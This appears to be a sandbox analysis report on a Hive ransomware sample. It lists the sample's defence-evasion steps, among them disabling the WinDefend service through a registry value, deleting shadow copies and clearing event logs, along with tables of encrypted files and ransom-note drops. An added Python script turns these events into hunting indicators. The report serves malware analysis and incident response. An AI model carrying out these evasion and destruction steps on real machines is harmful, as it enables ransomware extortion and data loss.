Analysis Overview
SHA256
9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1
Threat Level: Known bad
The file 9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies security service
Modifies Windows Defender Real-time Protection settings
Hive
Deletes shadow copies
Clears Windows event logs
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 15:00
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 15:00
Reported
2022-01-12 15:00
Platform
win10-en-20211208
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 15:00
Reported
2022-01-12 15:05
Platform
win7-en-20211208
Max time kernel
126s
Max time network
127s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00482_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\tab_off.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01253_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CALHM.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\OriginMergeFax.Dotx.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01607U.BMP.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\BTOPENWORLD.COM.XML.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FORMCTL.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198025.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\fr-FR\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\Accessible.tlb.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SLATE\SLATE.INF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0212299.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0222021.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\deploy\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ps.txt.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile16.png | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_increaseindent.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341653.JPG.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\it.txt.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\include\jawt.h.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB00760L.GIF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14757_.GIF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\agQX_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Earthy.css.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp | C:\Users\Admin\AppData\Local\Temp\9d9a232a03f5a08d77075f673660688a0b4f336fbb2f0fefdcd4776f237eb2e1.bin.sample.exe | N/A |
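The renamed files in the table above all follow one pattern: the original name, a long base64url-style token (two variants occur in this run, differing only in their tail), and the extension `.s72gp`. The ransom note `agQX_HOW_TO_DECRYPT.txt` is created in each directory the encryptor visits, and a few entries (for example `GreenBubbles.jpg`) are opened without any suffix in that event. The Python below is an added example, not part of the sandbox output or of the sample: it parses a hand-copied subset of the rows above (constructed input) into hunt-ready indicators. The regex group names, the `summarize` and `hunt_globs` helpers and the `<none>` placeholder are this example's own choices.

```python
import ntpath
import re
from collections import Counter

# Constructed input: a hand-copied subset of the "Drops file in Program Files directory"
# rows above, as (description, path) pairs.
SAMPLE_EVENTS = [
    ("File opened for modification",
     r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00482_.WMF.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp"),
    ("File opened for modification",
     r"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp"),
    ("File opened for modification",
     r"C:\Program Files (x86)\Common Files\microsoft shared\Stationery\GreenBubbles.jpg"),
    ("File opened for modification",
     r"C:\Program Files (x86)\Microsoft Office\Templates\1033\OriginMergeFax.Dotx.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_IAAAACAAAAA0.s72gp"),
    ("File created",
     r"C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\agQX_HOW_TO_DECRYPT.txt"),
    ("File opened for modification",
     r"C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp"),
    ("File created",
     r"C:\Program Files\Java\jre7\lib\deploy\agQX_HOW_TO_DECRYPT.txt"),
    ("File opened for modification",
     r"C:\Program Files\7-Zip\Lang\ps.txt.-uLNVomfcuMpwYkaLo5PE3AvtQQyuUMHHcJ7lbrFNMb_AAAAAAAAAAA0.s72gp"),
]

# Encrypted-file name as it appears above: <original name>.<token>.<extension>. The token is a
# long base64url-looking string (40+ chars here); the extension is "s72gp" in this run.
ENCRYPTED_RE = re.compile(
    r"^(?P<orig>.+)\.(?P<token>[A-Za-z0-9_-]{40,})\.(?P<ext>[A-Za-z0-9]{3,8})$")
# Ransom note: <short tag>_HOW_TO_DECRYPT.txt ("agQX" in this run).
NOTE_RE = re.compile(r"^(?P<tag>[A-Za-z0-9]+)_HOW_TO_DECRYPT\.txt$", re.IGNORECASE)


def classify(path):
    """Classify one path: ("encrypted", original_name, token, ext), ("note", tag) or ("touched",)."""
    name = ntpath.basename(path)
    m = ENCRYPTED_RE.match(name)
    if m:
        return ("encrypted", m["orig"], m["token"], m["ext"])
    m = NOTE_RE.match(name)
    if m:
        return ("note", m["tag"])
    return ("touched",)  # opened, but no suffix visible in this event


def summarize(events):
    """Aggregate file events into hunt-ready indicators for this run."""
    ext_counts, tokens, orig_exts = Counter(), set(), Counter()
    note_names, note_dirs, touched = set(), [], []
    for _desc, path in events:
        kind, *fields = classify(path)
        if kind == "encrypted":
            orig, token, ext = fields
            ext_counts[ext] += 1
            tokens.add(token)
            # extension of the file *before* encryption, "<none>" if it had none
            orig_exts[ntpath.splitext(orig)[1].lower() or "<none>"] += 1
        elif kind == "note":
            note_names.add(ntpath.basename(path))
            note_dirs.append(ntpath.dirname(path))
        else:
            touched.append(path)
    return {
        "encrypted_suffix": ext_counts.most_common(1)[0][0] if ext_counts else None,
        "encrypted_count": sum(ext_counts.values()),
        "tokens": sorted(tokens),
        "original_extensions": dict(orig_exts),
        "note_names": sorted(note_names),
        "note_dirs": note_dirs,
        "touched_without_suffix": touched,
    }


def hunt_globs(summary):
    """Filesystem globs a responder can sweep shares for: the suffix and each note name."""
    globs = []
    if summary["encrypted_suffix"]:
        globs.append("*." + summary["encrypted_suffix"])
    globs.extend(summary["note_names"])
    return globs


if __name__ == "__main__":
    s = summarize(SAMPLE_EVENTS)
    for key, value in s.items():
        print(f"{key}: {value}")
    print("sweep for:", hunt_globs(s))
```

Feeding the full table (or a file-server's Sysmon file-create events) through `summarize` gives the per-run suffix, the distinct key tokens and the note-drop directories; `hunt_globs` turns those into the two patterns worth sweeping before an outage escalates, `*.s72gp` and `agQX_HOW_TO_DECRYPT.txt`. The entries without a suffix are reported separately because the table alone does not say whether they were skipped or renamed later.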
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
